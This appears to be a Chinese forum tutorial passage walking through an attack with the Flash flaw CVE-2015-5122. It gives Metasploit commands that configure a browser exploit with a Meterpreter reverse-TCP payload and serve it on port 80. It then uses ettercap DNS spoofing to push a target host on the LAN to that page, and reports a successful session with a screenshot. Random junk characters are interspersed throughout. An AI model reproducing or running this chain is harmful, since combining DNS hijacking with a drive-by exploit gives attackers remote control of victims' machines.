|
, k' Y! P! M1 T- l
二、cve2015-5122漏洞实例演示虚拟机 & K- [* I8 H8 x
8 |2 e! z; ?( l
3 W' A" h1 |( N T9 s) d1 H+ k 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 1 l4 R9 z. Q. o, t% B
6 l8 h; T9 ?3 F# |7 K1 u
( ~: ~$ B$ _' j- P& v
search cve-2015-5122如图: # p$ [) O# o7 {
U! w6 l4 {. O6 T8 ~
; w* Q& ], }* y7 I N0 _- T$ j5 B$ C3 N
2 K4 A0 K" @1 W' O1 h/ x
# F# \9 ?7 a( F- N) `: o5 v
" s" E: D6 i- h2 J3 x! E* Q 下面我们敲如下命令: 0 `# V' F* W: S1 u
5 R' v1 S9 B0 {% Z0 O E$ |8 W6 i6 U$ ?4 e% }* x
use exploit/multi/browser/adobe_flash_opaque_background_uaf , z; [* [+ W7 S! x# G
/ y; \5 t$ `" v& ]! H
7 k4 a( o; s" Y) p" V8 d% T set PAYLOAD windows/meterpreter/reverse_tcp 9 l5 o2 f- }* {# c
7 T1 F' X8 X# K" w
! [* N$ `2 L: D6 N1 C# _3 ~( _ set LHOST 192.168.0.109
4 s8 h7 U$ v X9 E# P 7 X% U% ?' b, |8 U/ B4 L
# f: ?2 n/ b2 _! q2 `! \
set URIPATH / /*根目录*/ 1 ?* B$ Q( ~7 i; }/ {4 ~0 z
$ M& Y. N! [1 z/ Z* ]% }# f2 f
) Y0 {& h! {+ w& z! T set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 A5 ?: W7 b" J- f" i0 f 9 \" i* ]4 L8 y; n: s( ?
; o, I$ x8 S" T \# n set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! n0 u* F9 u, M3 e9 m- {% @# o% U
( x+ s9 R' J9 p
3 w2 k/ Z' X: I/ \7 f 然后show options如图: 4 h; f5 Y" C+ Y; N
2 r" P5 V5 P7 Y% T; a2 h
, z* n" {' u7 X$ G 4 o8 P; o% H. q5 O7 J
. `% @ y$ M. M; S `8 I4 f. A6 F, M# C. ]6 w* A+ q. g7 b
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
# C6 m7 a: P3 z- H# M& B9 w5 s
: ~4 l! ]" ^- F0 e8 B/ i
6 R" y8 p- |! ~! s
9 e" P1 Q) @/ p$ Z% x R& ]+ y' h 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 1 |) A! X: ]% K2 F6 q1 v$ i" l5 b
7 _& X6 \* h0 P2 b8 U3 X
; l3 T* ?6 {: z# E. c Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
3 l2 B0 G/ L4 O7 {! ?7 D 6 {! M4 ?$ N$ x- A9 q2 K. N
! Z" W& t( g' E8 t 5 W$ w& R1 B) @5 }% V, D
4 L! X( @7 ]' w8 W
* S5 E' i/ H) k' F: u 成功了,这时候我们断开ettercap,如图: 7 u7 O& y' n4 y- L0 m8 |4 n
8 y- {9 }( G1 F* e5 M1 O
# C( O/ J/ O* d" @ * y. U4 V/ P" d7 p8 e: N8 K/ v
4 X9 f* N% v5 ?' i; e( i( w
. S" ^! q8 a$ s2 j, m
Screenshot如图:
4 H# F+ A0 ^5 T& `3 Z7 w1 P 8 \# J. H3 ~. F
' A. t3 [2 p8 X: `2 M5 N4 S3 x7 ^ + v5 ]$ m: b# H: e" `
) G+ a+ L- i' E( Y
) [9 r, I$ w* w, G
% i9 i/ [' X2 s. e9 S$ h% R
|